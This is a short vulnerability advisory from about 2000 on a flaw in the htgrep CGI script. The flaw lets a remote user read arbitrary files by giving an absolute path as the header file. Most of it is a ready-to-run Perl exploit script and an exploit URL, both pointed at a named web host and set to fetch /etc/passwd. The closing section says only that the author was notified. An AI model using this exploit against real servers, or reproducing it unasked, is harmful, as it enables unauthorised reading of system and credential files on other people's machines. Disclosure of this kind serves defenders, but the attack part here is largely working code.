COMMAND

    htgrep

SYSTEMS AFFECTED

    Htgrep CGI

PROBLEM

    'n30' found following.  Any  remote user can view arbitrary  files
    on the  system with  the privileges  of the  web user with htgrep.
    The CGI allows a  user to specify a  header and footer file  to be
    appended to  the search  output, this  file should  be located  in
    the wwwroot which is specified in the script itself.  Any  attempt
    to specify a  header or footer  file by using  backwards directory
    referencing is trapped.  Although it is possible to specify a file
    using an absolute path.

    Exploit:

        http://www.dematel.com/cgibin/htgrep/file=index.html&hdr=/etc/passwd

    The  File  /etc/passwd  will  be  displayed instead of the default
    header file.  Code:

    #!/usr/local/bin/perl
    #
    # Htgrep EXPLOIT Script by n30 17/8/2000
    #
    # For: Unix/Linux all Distro's
    #      maybe Winnt?? anyone??
    #
    # Versions: All upto latest: htgrep v3.0
    #
    # Info: to find the version number being used:
    #
    #	www.server.com/cgi-bin/htgrep/version
    #
    # Some ppl use a wrapper for the script thusly
    # eliminating the file argument, the sploit will
    # still werk just add &hdr=<filename> to the end :-)
    #
    # if &isindex=<text> is present in the URL REMOVE IT!!!
    # or else the exploit won't werk :-)
    #
    # Mail : n30@gmx.co.uk
    
    use strict;
    use LWP::UserAgent;
    use HTTP::Request;
    use HTTP::Response;
    my $ua = new LWP::UserAgent;
    
    # *************************************************
    my $TargetHost="www.dematel.com";
    my $TargetPath="/cgibin/htgrep";
    # SearchFile can commonly be index.html or some other file in the wwwroot
    my $SearchFile="index.html";
    # FiletoGet ?? think for ur self:
    my $FiletoGet="/etc/passwd";
    # **************************************************
    
    my $url="http://".$TargetHost.$TargetPath."/file=$SearchFile&hdr=$FiletoGet";
    
     print("\nHtgrep Arbitrary File Reading Vulnerability EXPLOIT /n30\n\n");
    
     print("URL: $url\n\n");
    
     my $request = new HTTP::Request('GET', $url);
     my $response = $ua->request($request);
     if ($response->is_success) {
          print $response->content;
     } else {
          print $response->error_as_HTML;
     }

SOLUTION

    The author has been notified, it is likely that an update will  be
    available shortly.